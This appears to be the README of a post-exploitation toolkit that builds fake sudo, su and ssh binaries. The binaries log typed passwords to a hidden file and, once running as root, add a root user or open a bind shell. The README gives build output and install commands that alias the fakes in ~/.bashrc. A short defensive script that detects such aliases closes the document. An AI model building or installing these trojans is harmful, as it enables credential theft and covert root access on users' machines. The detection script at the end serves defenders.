fakesudo cmd runs sudo fakesudo cmd
After it is running as root, fakesudo creates a child process for executing some of the modules, and in the main PID it runs the original command.
Note: fakesudo only changes the command if the user runs sudo cmd [args]; if additional flags are used, the command isn't touched.
Almost the same process happens with the su:
The user types su -
fakesu - runs
fakesu executes su - -c fakesu
After it is running as root, fakesu creates a child process for executing some of the modules, and in the main PID it runs bash -i
Note: fakesu only changes the command if the user runs su or su -; if additional flags are used, the command isn't touched.
For now, there are only three modules:
I can add more modules in the future, but if you are familiar with the C language, it is not very difficult to change the programs to run what you want as root: modify a few lines of code and change the super() function.
First, build the base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
After that, you can build generic-keylogger, sudo or su by running make [target-bin].
Example:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
Install:
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
In action:
Compile:
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
Install:
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
In action:
leet-shell is an example of how you can manipulate the tty output; it lets you use bash like a 1337 h4x0r.
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!
Some things can make the fake programs not work as expected:
sudo will always ask for the password when the keylogger function is enabled in fakesudo.
How to protect yourself?
This is a post-exploitation technique for privilege escalation and information gathering; if you want to protect yourself, not getting compromised in the first place is a good way to start…
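A defender-side check, added here and not part of tas: it scans shell startup files for the alias or function shadowing of sudo, su and ssh that the install steps above rely on, and reports whether a name is aliased in the current session. The file names scanned by main are an assumption; only POSIX sh, grep and sed are used.

```shell
#!/bin/sh
# Added defensive check, not part of tas: report shell aliases or functions
# that shadow sudo, su or ssh, the mechanism the fake binaries rely on.
# Assumes only POSIX sh, grep and sed; callers pass the files to inspect.

SHADOW_RE='^[[:space:]]*(alias[[:space:]]+(sudo|su|ssh)=|(function[[:space:]]+)?(sudo|su|ssh)[[:space:]]*\(\))'

# find_shadowed_aliases FILE...
# Prints every matching line as FILE:LINENO:text.
# Returns 0 when nothing suspicious is found, 1 otherwise.
find_shadowed_aliases() {
    found=0
    for f in "$@"; do
        [ -r "$f" ] || continue
        hits=$(grep -nE "$SHADOW_RE" "$f") || continue
        found=1
        printf '%s\n' "$hits" | sed "s|^|$f:|"
    done
    return "$found"
}

# is_aliased NAME
# Returns 0 if NAME is defined as an alias in this shell session, which means
# typing NAME will not run the binary found on PATH.
is_aliased() {
    alias "$1" >/dev/null 2>&1
}

# Typical run from a user's shell: scan the startup files bash and sh read
# (the install steps above append exactly such an alias line to ~/.bashrc).
# The list of files is an assumption; add whatever your shell sources.
main() {
    if find_shadowed_aliases "$HOME/.bashrc" "$HOME/.bash_profile" \
                             "$HOME/.profile" "$HOME/.bash_aliases"; then
        echo "no sudo/su/ssh aliases or functions in shell startup files"
    else
        echo "WARNING: sudo/su/ssh is shadowed; confirm with: type sudo su ssh"
    fi
}

main
```

`type sudo` in an interactive shell shows whether the name resolves to an alias, a function or a file, so it is the quickest manual confirmation of what the script reports.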